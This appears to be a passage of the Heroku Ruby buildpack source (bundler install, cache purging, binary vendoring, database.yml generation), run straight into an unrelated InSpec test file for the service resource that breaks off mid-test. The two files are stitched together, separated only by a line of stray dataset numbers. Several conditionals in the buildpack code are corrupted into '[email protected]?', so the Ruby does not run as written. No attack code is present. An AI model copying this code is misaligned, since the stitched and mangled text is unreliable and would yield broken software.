end
error message
end
mcount "fail.bad_version_fetch"
mcount "fail.bad_version_fetch.#{ruby_version.version_for_download}"
message = <<ERROR
An error occurred while installing #{ruby_version.version_for_download}
Heroku recommends you use the latest supported Ruby version listed here:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
For more information on syntax for declaring a Ruby version see:
https://devcenter.heroku.com/articles/ruby-versions
ERROR
if ruby_version.jruby?
message << "Note: Only JRuby 1.7.13 and newer are supported on Cedar-14"
end
message << "\nDebug Information"
message << error.message
error message
end
# whether this is the first build of this app (no cached vendor/heroku dir).
# memoized with a defined? guard so a false result is cached too —
# the previous `||=` re-ran the File.exist? check on every call when the
# app was not new
# @return [Boolean]
def new_app?
  return @new_app if defined?(@new_app)
  @new_app = !File.exist?("vendor/heroku")
end
# vendors JVM into the slug for JRuby
# @param forced [Boolean] install even for non-JRuby apps (e.g. user opt-in)
def install_jvm(forced = false)
instrument 'ruby.install_jvm' do
if ruby_version.jruby? || forced
@jvm_installer.install(ruby_version.engine_version, forced)
end
end
end
# find the ruby install path for its binstubs during build
# prefers the /tmp build ruby when one was unpacked
# @return [String] resulting path or empty string if ruby is not vendored
def ruby_install_binstub_path
@ruby_install_binstub_path ||=
if ruby_version.build?
"#{build_ruby_path}/bin"
elsif ruby_version
"#{slug_vendor_ruby}/bin"
else
""
end
end
# setup the environment so we can use the vendored ruby
# prepends the vendored ruby's bin dir (absolute) to PATH
def setup_ruby_install_env
instrument 'ruby.setup_ruby_install_env' do
ENV["PATH"] = "#{File.expand_path(ruby_install_binstub_path)}:#{ENV["PATH"]}"
if ruby_version.jruby?
ENV['JAVA_OPTS'] = default_java_opts
end
end
end
# installs vendored gems into the slug
# copies the buildpack's bundled bundler into the gem vendor dir
def install_bundler_in_app
instrument 'ruby.install_language_pack_gems' do
FileUtils.mkdir_p(slug_vendor_base)
Dir.chdir(slug_vendor_base) do |dir|
`cp -R #{bundler.bundler_path}/. .`
end
# write bundler shim, so we can control the version bundler used
# Ruby 2.6.0 started vendoring bundler
write_bundler_shim("vendor/bundle/bin") if ruby_version.vendored_bundler?
end
end
# default set of binaries to install (node and/or yarn when needed)
# @return [Array] resulting list
def binaries
add_node_js_binary + add_yarn_binary
end
# vendors binaries into the slug and marks everything in bin/ executable
def install_binaries
instrument 'ruby.install_binaries' do
binaries.each {|binary| install_binary(binary) }
Dir["bin/*"].each {|path| run("chmod +x #{path}") }
end
end
# vendors individual binary into the slug
# node and yarn get dedicated installers; anything else is fetched
# from the buildpack's S3 bucket and untarred into bin/
# @param [String] name of the binary package from S3.
# Example: https://s3.amazonaws.com/language-pack-ruby/node-0.4.7.tgz, where name is "node-0.4.7"
def install_binary(name)
topic "Installing #{name}"
bin_dir = "bin"
FileUtils.mkdir_p bin_dir
Dir.chdir(bin_dir) do |dir|
if name.match(/^node\-/)
@node_installer.install
# need to set PATH here b/c `node-gyp` can change the CWD, but still depends on executing node.
# the current PATH is relative, but it needs to be absolute for this.
# doing this here also prevents it from being exported during runtime
node_bin_path = File.absolute_path(".")
# this needs to be set after so other binaries in bin/ don't take precedence"
ENV["PATH"] = "#{ENV["PATH"]}:#{node_bin_path}"
elsif name.match(/^yarn\-/)
FileUtils.mkdir_p("../vendor")
Dir.chdir("../vendor") do |vendor_dir|
@yarn_installer.install
yarn_path = File.absolute_path("#{vendor_dir}/#{@yarn_installer.binary_path}")
ENV["PATH"] = "#{yarn_path}:#{ENV["PATH"]}"
end
else
@fetchers[:buildpack].fetch_untar("#{name}.tgz")
end
end
end
# removes a previously vendored binary from the slug's bin directory
# @param path [String] path whose basename identifies the binary to delete
def uninstall_binary(path)
  target = File.join('bin', File.basename(path))
  FileUtils.rm(target, :force => true)
end
# whether the default bundler cache should be loaded: only for brand new
# apps running the default ruby version
def load_default_cache?
new_app? && ruby_version.default?
end
# loads a default bundler cache for new apps to speed up initial bundle installs
# NOTE(review): the `if false` makes this a deliberate no-op — the feature
# is currently disabled; the load_default_cache? check is kept in a comment
def load_default_cache
instrument "ruby.load_default_cache" do
if false # load_default_cache?
puts "New app detected loading default bundler cache"
patchlevel = run("ruby -e 'puts RUBY_PATCHLEVEL'").chomp
cache_name = "#{LanguagePack::RubyVersion::DEFAULT_VERSION}-p#{patchlevel}-default-cache"
@fetchers[:buildpack].fetch_untar("#{cache_name}.tgz")
end
end
end
# install libyaml into the LP to be referenced for psych compilation
# only needed on cedar-14 / heroku-16; newer stacks ship a usable libyaml
# @param [String] tmpdir to store the libyaml files
def install_libyaml(dir)
return false if stack_not_14_not_16?
instrument 'ruby.install_libyaml' do
FileUtils.mkdir_p dir
Dir.chdir(dir) do
@fetchers[:buildpack].fetch_untar("#{@stack}/#{LIBYAML_PATH}.tgz")
end
end
end
# remove `vendor/bundle` that comes from the git repo
# in case there are native ext.
# users should be using `bundle pack` instead.
# https://github.com/heroku/heroku-buildpack-ruby/issues/21
def remove_vendor_bundle
  # File.exists? is deprecated and removed in Ruby 3.2; use File.exist?
  if File.exist?("vendor/bundle")
    warn(<<-WARNING)
Removing `vendor/bundle`.
Checking in `vendor/bundle` is not supported. Please remove this directory
and add it to your .gitignore. To vendor your gems with Bundler, use
`bundle pack` instead.
WARNING
    FileUtils.rm_rf("vendor/bundle")
  end
end
# relative directory where bundler writes gem binstubs during install
# @return [String]
def bundler_binstubs_path
  File.join("vendor", "bundle", "bin")
end
# absolute-ish path to the vendored bundler gem inside the slug (memoized)
def bundler_path
@bundler_path ||= "#{slug_vendor_base}/gems/#{bundler.dir_name}"
end
# writes an executable `bundle` shim so the buildpack controls which
# bundler version runs, even on rubies that vendor their own bundler
# @param path [String] directory to write the shim into
def write_bundler_shim(path)
FileUtils.mkdir_p(path)
shim_path = "#{path}/bundle"
File.open(shim_path, "w") do |file|
file.print <<-BUNDLE
#!/usr/bin/env ruby
require 'rubygems'
version = "#{bundler.version}"
if ARGV.first
str = ARGV.first
str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
version = $1
ARGV.shift
end
end
if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('bundler', 'bundle', version)
else
gem "bundler", version
load Gem.bin_path("bundler", "bundle", version)
end
BUNDLE
end
FileUtils.chmod(0755, shim_path)
end
# runs bundler to install the dependencies
# strips the BUNDLED WITH stanza from Gemfile.lock so the buildpack's
# bundler version wins, assembles the `bundle install` command, prepares a
# libyaml compile environment for psych, runs the install, then either
# stores the bundler cache or reports a targeted failure message
# @param default_bundle_without [String] groups skipped when BUNDLE_WITHOUT is unset
def build_bundler(default_bundle_without)
  instrument 'ruby.build_bundler' do
    topic("Removing BUNDLED WITH version in the Gemfile.lock")
    contents = File.read("Gemfile.lock")
    File.open("Gemfile.lock", "w") do |f|
      f.write contents.sub(/^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m, '')
    end
    log("bundle") do
      bundle_without = env("BUNDLE_WITHOUT") || default_bundle_without
      bundle_bin = "bundle"
      bundle_command = "#{bundle_bin} install --without #{bundle_without} --path vendor/bundle --binstubs #{bundler_binstubs_path}"
      bundle_command << " -j4"
      if File.exist?("#{Dir.pwd}/.bundle/config")
        warn(<<-WARNING, inline: true)
You have the `.bundle/config` file checked into your repository
It contains local state like the location of the installed bundle
as well as configured git local gems, and other settings that should
not be shared between multiple checkouts of a single repo. Please
remove the `.bundle/` folder from your repo and add it to your `.gitignore` file.
https://devcenter.heroku.com/articles/bundler-configuration
WARNING
      end
      if bundler.windows_gemfile_lock?
        warn(<<-WARNING, inline: true)
Removing `Gemfile.lock` because it was generated on Windows.
Bundler will do a full resolve so native gems are handled properly.
This may result in unexpected gem versions being used in your app.
In rare occasions Bundler may not be able to resolve your dependencies at all.
https://devcenter.heroku.com/articles/bundler-windows-gemfile
WARNING
        log("bundle", "has_windows_gemfile_lock")
        File.unlink("Gemfile.lock")
      else
        # using --deployment is preferred if we can
        bundle_command += " --deployment"
      end
      topic("Installing dependencies using bundler #{bundler.version}")
      load_bundler_cache
      bundler_output = ""
      bundle_time = nil
      env_vars = {}
      Dir.mktmpdir("libyaml-") do |tmpdir|
        libyaml_dir = "#{tmpdir}/#{LIBYAML_PATH}"
        install_libyaml(libyaml_dir)
        # need to setup compile environment for the psych gem
        yaml_include = File.expand_path("#{libyaml_dir}/include").shellescape
        yaml_lib = File.expand_path("#{libyaml_dir}/lib").shellescape
        pwd = Dir.pwd
        bundler_path = "#{pwd}/#{slug_vendor_base}/gems/#{bundler.dir_name}/lib"
        # we need to set BUNDLE_CONFIG and BUNDLE_GEMFILE for
        # codon since it uses bundler.
        env_vars["BUNDLE_GEMFILE"] = "#{pwd}/Gemfile"
        env_vars["BUNDLE_CONFIG"] = "#{pwd}/.bundle/config"
        env_vars["CPATH"] = noshellescape("#{yaml_include}:$CPATH")
        env_vars["CPPATH"] = noshellescape("#{yaml_include}:$CPPATH")
        env_vars["LIBRARY_PATH"] = noshellescape("#{yaml_lib}:$LIBRARY_PATH")
        env_vars["RUBYOPT"] = syck_hack
        env_vars["NOKOGIRI_USE_SYSTEM_LIBRARIES"] = "true"
        env_vars["BUNDLE_DISABLE_VERSION_CHECK"] = "true"
        env_vars["JAVA_HOME"] = noshellescape("#{pwd}/$JAVA_HOME") if ruby_version.jruby?
        env_vars["BUNDLER_LIB_PATH"] = "#{bundler_path}" if ruby_version.ruby_version == "1.8.7"
        # NOTE: a second, identical BUNDLE_DISABLE_VERSION_CHECK assignment
        # previously followed here; it was a no-op duplicate and was removed
        puts "Running: #{bundle_command}"
        instrument "ruby.bundle_install" do
          bundle_time = Benchmark.realtime do
            bundler_output << pipe("#{bundle_command} --no-clean", out: "2>&1", env: env_vars, user_env: true)
          end
        end
      end
      if $?.success?
        puts "Bundle completed (#{"%.2f" % bundle_time}s)"
        log "bundle", :status => "success"
        puts "Cleaning up the bundler cache."
        instrument "ruby.bundle_clean" do
          # Only show bundle clean output when not using default cache
          if load_default_cache?
            run("#{bundle_bin} clean > /dev/null", user_env: true, env: env_vars)
          else
            pipe("#{bundle_bin} clean", out: "2> /dev/null", user_env: true, env: env_vars)
          end
        end
        @bundler_cache.store
        # Keep gem cache out of the slug
        FileUtils.rm_rf("#{slug_vendor_base}/cache")
      else
        mcount "fail.bundle.install"
        log "bundle", :status => "failure"
        error_message = "Failed to install gems via Bundler."
        puts "Bundler Output: #{bundler_output}"
        if bundler_output.match(/An error occurred while installing sqlite3/)
          mcount "fail.sqlite3"
          error_message += <<-ERROR
Detected sqlite3 gem which is not supported on Heroku:
https://devcenter.heroku.com/articles/sqlite3
ERROR
        end
        if bundler_output.match(/but your Gemfile specified/)
          mcount "fail.ruby_version_mismatch"
          error_message += <<-ERROR
Detected a mismatch between your Ruby version installed and
Ruby version specified in Gemfile or Gemfile.lock. You can
correct this by running:
$ bundle update --ruby
$ git add Gemfile.lock
$ git commit -m "update ruby version"
If this does not solve the issue please see this documentation:
https://devcenter.heroku.com/articles/ruby-versions#your-ruby-version-is-x-but-your-gemfile-specified-y
ERROR
        end
        error error_message
      end
    end
  end
end
# post-install cleanup: strip .git dirs out of vendored gems (keeps the
# slug small and avoids nested-repo confusion) and let bundler clean up
def post_bundler
instrument "ruby.post_bundler" do
Dir[File.join(slug_vendor_base, "**", ".git")].each do |dir|
FileUtils.rm_rf(dir)
end
bundler.clean
end
end
# RUBYOPT line that requires syck_hack file
# @return [String] require string if needed or else an empty string
def syck_hack
instrument "ruby.syck_hack" do
syck_hack_file = File.expand_path(File.join(File.dirname(__FILE__), "../../vendor/syck_hack"))
rv = run_stdout('ruby -e "puts RUBY_VERSION"').chomp
# < 1.9.3 includes syck, so we need to use the syck hack
if Gem::Version.new(rv) < Gem::Version.new("1.9.3")
"-r#{syck_hack_file}"
else
""
end
end
end
# writes ERB based database.yml for Rails. The database.yml uses the DATABASE_URL from the environment during runtime.
# skipped for Rails >= 4.1 (activerecord reads DATABASE_URL natively) and
# when the app has no config/ directory
def create_database_yml
instrument 'ruby.create_database_yml' do
return false unless File.directory?("config")
return false if bundler.has_gem?('activerecord') && bundler.gem_version('activerecord') >= Gem::Version.new('4.1.0.beta1')
log("create_database_yml") do
topic("Writing config/database.yml to read from DATABASE_URL")
File.open("config/database.yml", "w") do |file|
file.puts <<-DATABASE_YML
<%
require 'cgi'
require 'uri'
begin
uri = URI.parse(ENV["DATABASE_URL"])
rescue URI::InvalidURIError
raise "Invalid DATABASE_URL"
end
raise "No RACK_ENV or RAILS_ENV found" unless ENV["RAILS_ENV"] || ENV["RACK_ENV"]
def attribute(name, value, force_string = false)
if value
value_string =
if force_string
'"' + value + '"'
else
value
end
"\#{name}: \#{value_string}"
else
""
end
end
adapter = uri.scheme
adapter = "postgresql" if adapter == "postgres"
database = (uri.path || "").split("/")[1]
username = uri.user
password = uri.password
host = uri.host
port = uri.port
params = CGI.parse(uri.query || "")
%>
<%= ENV["RAILS_ENV"] || ENV["RACK_ENV"] %>:
<%= attribute "adapter", adapter %>
<%= attribute "database", database %>
<%= attribute "username", username %>
<%= attribute "password", password, true %>
<%= attribute "host", host %>
<%= attribute "port", port %>
<% params.each do |key, value| %>
<%= key %>: <%= value.first %>
<% end %>
DATABASE_YML
end
end
end
end
# memoized rake task runner; raising on load failure only for Rails 4+
# apps (railties > 3.x), where broken rake tasks must abort the build
def rake
@rake ||= begin
rake_gem_available = bundler.has_gem?("rake") || ruby_version.rake_is_vendored?
raise_on_fail = bundler.gem_version('railties') && bundler.gem_version('railties') > Gem::Version.new('3.x')
topic "Detecting rake tasks"
rake = LanguagePack::Helpers::RakeRunner.new(rake_gem_available)
rake.load_rake_tasks!({ env: rake_env }, raise_on_fail)
rake
end
end
# environment hash for rake task invocations: DATABASE_URL (when present)
# merged with the user's env vars (user vars take precedence via merge)
def rake_env
  base = if database_url
           { "DATABASE_URL" => database_url }
         else
           {}
         end
  base.merge(user_env_hash)
end
# the user-provided DATABASE_URL, or nil when it is not set
def database_url
env("DATABASE_URL") if env("DATABASE_URL")
end
# executes the block with GIT_DIR environment variable removed since it can mess with the current working directory git thinks it's in
# GIT_DIR is now restored in an ensure block so an exception inside the
# block can no longer leave the variable permanently unset
# @param [block] block to be executed in the GIT_DIR free context
# @return the block's return value
def allow_git(&blk)
  git_dir = ENV.delete("GIT_DIR") # can mess with bundler
  blk.call
ensure
  ENV["GIT_DIR"] = git_dir
end
# decides if we need to enable the dev database addon
# @return [Array] the database addon if the pg gem is detected or an empty Array if it isn't.
def add_dev_database_addon
pg_adapters.any? {|a| bundler.has_gem?(a) } ? ['heroku-postgresql'] : []
end
# gem names that indicate the app talks to PostgreSQL: the MRI pg gem
# plus the various JRuby/JDBC adapter gems
# @return [Array<String>]
def pg_adapters
  %w[
    pg
    activerecord-jdbcpostgresql-adapter
    jdbc-postgres
    jdbc-postgresql
    jruby-pg
    rjack-jdbc-postgres
    tgbyte-activerecord-jdbcpostgresql-adapter
  ]
end
# decides if we need to install the node.js binary
# @note execjs will blow up if no JS RUNTIME is detected and is loaded.
# @return [Array] the node.js binary path if we need it or an empty Array
def add_node_js_binary
if (bundler.has_gem?('execjs') || bundler.has_gem?('webpacker')) && node_not_preinstalled?
[@node_installer.binary_path]
else
[]
end
end
# yarn is only needed when webpacker is bundled and yarn is not already
# provided by an earlier buildpack
# @return [Array] the yarn installer name, or an empty Array
def add_yarn_binary
  if bundler.has_gem?('webpacker') && yarn_not_preinstalled?
    [@yarn_installer.name]
  else
    []
  end
end
# whether this build will vendor its own yarn binary
def has_yarn_binary?
add_yarn_binary.any?
end
# checks if node.js is installed via the official heroku-buildpack-nodejs using multibuildpack
# memoizes false deliberately (guarded by defined?) so the shell-outs run once
# @return String if it's detected and false if it isn't
def node_preinstall_bin_path
return @node_preinstall_bin_path if defined?(@node_preinstall_bin_path)
legacy_path = "#{Dir.pwd}/#{NODE_BP_PATH}"
path = run("which node")
if path && $?.success?
@node_preinstall_bin_path = path
elsif run("#{legacy_path}/node -v") && $?.success?
@node_preinstall_bin_path = legacy_path
else
@node_preinstall_bin_path = false
end
end
# node_js_installed? returns the detected path (truthy) or false
alias :node_js_installed? :node_preinstall_bin_path
# true when no earlier buildpack provided a node binary
def node_not_preinstalled?
!node_js_installed?
end
# checks for a yarn binary provided by an earlier buildpack
# memoizes false deliberately (guarded by defined?) so `which` runs once
# @return [String, false] path to yarn, or false when not found
def yarn_preinstall_bin_path
return @yarn_preinstall_bin_path if defined?(@yarn_preinstall_bin_path)
path = run("which yarn")
if path && $?.success?
@yarn_preinstall_bin_path = path
else
@yarn_preinstall_bin_path = false
end
end
# true when no earlier buildpack provided a yarn binary
def yarn_not_preinstalled?
!yarn_preinstall_bin_path
end
# runs the app's assets:precompile rake task when it is defined,
# reporting timing on success and a detailed failure message otherwise
def run_assets_precompile_rake_task
instrument 'ruby.run_assets_precompile_rake_task' do
precompile = rake.task("assets:precompile")
return true unless precompile.is_defined?
topic "Precompiling assets"
precompile.invoke(env: rake_env)
if precompile.success?
puts "Asset precompilation completed (#{"%.2f" % precompile.time}s)"
else
precompile_fail(precompile.output)
end
end
end
# reports an assets:precompile failure with targeted hints and aborts the build
# @param output [String] captured output from the precompile task
def precompile_fail(output)
  mcount "fail.assets_precompile"
  log "assets_precompile", :status => "failure"
  msg = "Precompiling assets failed.\n"
  if output.match(/(127\.0\.0\.1)|(org\.postgresql\.util)/)
    msg << "Attempted to access a nonexistent database:\n"
    msg << "https://devcenter.heroku.com/articles/pre-provision-database\n"
  end
  sprockets_version = bundler.gem_version('sprockets')
  # guard against nil: gem_version returns nil when sprockets is not bundled,
  # and `nil < Gem::Version` would raise NoMethodError and mask the real failure
  if sprockets_version && output.match(/Sprockets::FileNotFound/) && (sprockets_version < Gem::Version.new('4.0.0.beta7') && sprockets_version > Gem::Version.new('4.0.0.beta4'))
    mcount "fail.assets_precompile.file_not_found_beta"
    msg << "If you have this file in your project\n"
    msg << "try upgrading to Sprockets 4.0.0.beta7 or later:\n"
    msg << "https://github.com/rails/sprockets/pull/547\n"
  end
  error msg
end
# relative directory holding the cached bundle between builds
def bundler_cache
"vendor/bundle"
end
def load_bundler_cache
instrument "ruby.load_bundler_cache" do
cache.load "vendor"
full_ruby_version = run_stdout(%q(ruby -v)).chomp
rubygems_version = run_stdout(%q(gem -v)).chomp
heroku_metadata = "vendor/heroku"
old_rubygems_version = nil
ruby_version_cache = "ruby_version"
buildpack_version_cache = "buildpack_version"
bundler_version_cache = "bundler_version"
rubygems_version_cache = "rubygems_version"
stack_cache = "stack"
# bundle clean does not remove binstubs
FileUtils.rm_rf("vendor/bundler/bin")
old_rubygems_version = @metadata.read(ruby_version_cache).chomp if @metadata.exists?(ruby_version_cache)
old_stack = @metadata.read(stack_cache).chomp if @metadata.exists?(stack_cache)
old_stack ||= DEFAULT_LEGACY_STACK
stack_change = old_stack != @stack
convert_stack = @bundler_cache.old?
@bundler_cache.convert_stack(stack_change) if convert_stack
if !new_app? && stack_change
puts "Purging Cache. Changing stack from #{old_stack} to #{@stack}"
purge_bundler_cache(old_stack)
elsif !new_app? && !convert_stack
@bundler_cache.load
end
# fix bug from v37 deploy
if File.exists?("vendor/ruby_version")
puts "Broken cache detected. Purging build cache."
cache.clear("vendor")
FileUtils.rm_rf("vendor/ruby_version")
purge_bundler_cache
# fix bug introduced in v38
elsif [email protected]?(buildpack_version_cache) && @metadata.exists?(ruby_version_cache)
puts "Broken cache detected. Purging build cache."
purge_bundler_cache
elsif (@bundler_cache.exists? || @bundler_cache.old?) && @metadata.exists?(ruby_version_cache) && full_ruby_version != @metadata.read(ruby_version_cache).chomp
puts "Ruby version change detected. Clearing bundler cache."
puts "Old: #{@metadata.read(ruby_version_cache).chomp}"
puts "New: #{full_ruby_version}"
purge_bundler_cache
end
# fix git gemspec bug from Bundler 1.3.0+ upgrade
if File.exists?(bundler_cache) && [email protected]?(bundler_version_cache) && !run("find vendor/bundle/*/*/bundler/gems/*/ -name *.gemspec").include?("No such file or directory")
puts "Old bundler cache detected. Clearing bundler cache."
purge_bundler_cache
end
# fix for https://github.com/heroku/heroku-buildpack-ruby/issues/86
if ([email protected]?(rubygems_version_cache) ||
(old_rubygems_version == "2.0.0" && old_rubygems_version != rubygems_version)) &&
@metadata.exists?(ruby_version_cache) && @metadata.read(ruby_version_cache).chomp.include?("ruby 2.0.0p0")
puts "Updating to rubygems #{rubygems_version}. Clearing bundler cache."
purge_bundler_cache
end
# fix for https://github.com/sparklemotion/nokogiri/issues/923
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 76
puts "Fixing nokogiri install. Clearing bundler cache."
puts "See https://github.com/sparklemotion/nokogiri/issues/923."
purge_bundler_cache
end
# recompile nokogiri to use new libyaml
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 99 && bundler.has_gem?("psych")
puts "Need to recompile psych for CVE-2013-6393. Clearing bundler cache."
puts "See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737076."
purge_bundler_cache
end
# recompile gems for libyaml 0.1.7 update
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 147 &&
(@metadata.exists?(ruby_version_cache) && @metadata.read(ruby_version_cache).chomp.match(/ruby 2\.1\.(9|10)/) ||
bundler.has_gem?("psych")
)
puts "Need to recompile gems for CVE-2014-2014-9130. Clearing bundler cache."
puts "See https://devcenter.heroku.com/changelog-items/1016."
purge_bundler_cache
end
FileUtils.mkdir_p(heroku_metadata)
@metadata.write(ruby_version_cache, full_ruby_version, false)
@metadata.write(buildpack_version_cache, BUILDPACK_VERSION, false)
@metadata.write(bundler_version_cache, bundler.version, false)
@metadata.write(rubygems_version_cache, rubygems_version, false)
@metadata.write(stack_cache, @stack, false)
@metadata.save
end
end
# clears the bundler cache and reinstalls the buildpack's bundler
# @param stack [String, nil] stack whose cache should be cleared
def purge_bundler_cache(stack = nil)
instrument "ruby.purge_bundler_cache" do
@bundler_cache.clear(stack)
# need to reinstall language pack gems
install_bundler_in_app
end
end
end
| 32.306729 | 185 | 0.677679 |
1a5552a70e89769225e22ef6198451d7b3a6a687 | 20,093 | # encoding: utf-8
# author: Christoph Hartmann
# author: Dominik Richter
require 'helper'
require 'inspec/resource'
require 'hashie'
describe 'Inspec::Resources::Service' do
let(:runlevels) { {0=>false, 1=>false, 2=>true, 3=>true, 4=>true, 5=>true, 6=>false} }
# windows
# Windows: service details come from the Windows service manager.
it 'verify service parsing' do
  resource = MockLoader.new(:windows).load_resource('service', 'dhcp')
  params = Hashie::Mash.new({})
  _(resource.type).must_equal 'windows'
  _(resource.name).must_equal 'dhcp'
  _(resource.description).must_equal 'DHCP Client'
  _(resource.installed?).must_equal true
  _(resource.enabled?).must_equal true
  _(resource.running?).must_equal true
  # removed the stray space that was between the receiver and the matcher
  _(resource.startmode).must_equal 'Auto'
  _(resource.params).must_equal params
end
# ubuntu 14.04 with upstart
it 'verify ubuntu service parsing' do
resource = MockLoader.new(:ubuntu1404).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify ubuntu service parsing with default upstart_service' do
resource = MockLoader.new(:ubuntu1404).load_resource('upstart_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# ubuntu 15.04 with systemd
# Renamed: the description previously duplicated the ubuntu 14.04 example's,
# which made failure output ambiguous between the two tests.
it 'verify ubuntu 15.04 service parsing' do
  resource = MockLoader.new(:ubuntu1504).load_resource('service', 'sshd')
  params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
  _(resource.type).must_equal 'systemd'
  _(resource.name).must_equal 'sshd.service'
  _(resource.description).must_equal 'OpenSSH server daemon'
  _(resource.installed?).must_equal true
  _(resource.enabled?).must_equal true
  _(resource.running?).must_equal true
  _(resource.params).must_equal params
  _(resource.params.SubState).must_equal 'running'
end
it 'verify ubuntu service parsing with default systemd_service' do
resource = MockLoader.new(:ubuntu1504).load_resource('systemd_service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# linux mint 17 with upstart
it 'verify mint service parsing' do
resource = MockLoader.new(:mint17).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify mint service parsing with default upstart_service' do
resource = MockLoader.new(:mint17).load_resource('upstart_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# mint 18 with systemd
# Renamed: the description previously duplicated the mint 17 example's,
# which made failure output ambiguous between the two tests.
it 'verify mint 18 service parsing' do
  resource = MockLoader.new(:mint18).load_resource('service', 'sshd')
  params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
  _(resource.type).must_equal 'systemd'
  _(resource.name).must_equal 'sshd.service'
  _(resource.description).must_equal 'OpenSSH server daemon'
  _(resource.installed?).must_equal true
  _(resource.enabled?).must_equal true
  _(resource.running?).must_equal true
  _(resource.params).must_equal params
  _(resource.params.SubState).must_equal 'running'
end
it 'verify mint service parsing with default systemd_service' do
resource = MockLoader.new(:mint18).load_resource('systemd_service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# Amazon Linux
it 'verify amazon linux service parsing' do
resource = MockLoader.new(:amazon).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# Amazon Linux 2
it 'verify amazon linux 2 service parsing' do
resource = MockLoader.new(:amazon2).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# centos 6 with sysv
it 'verify centos 6 service parsing' do
resource = MockLoader.new(:centos6).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.SubState).must_be_nil
end
it 'verify centos 6 service parsing with default sysv_service' do
resource = MockLoader.new(:centos6).load_resource('sysv_service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# centos 7 with systemd
it 'verify centos 7 service parsing' do
resource = MockLoader.new(:centos7).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify centos 7 service parsing with systemd_service and service_ctl override' do
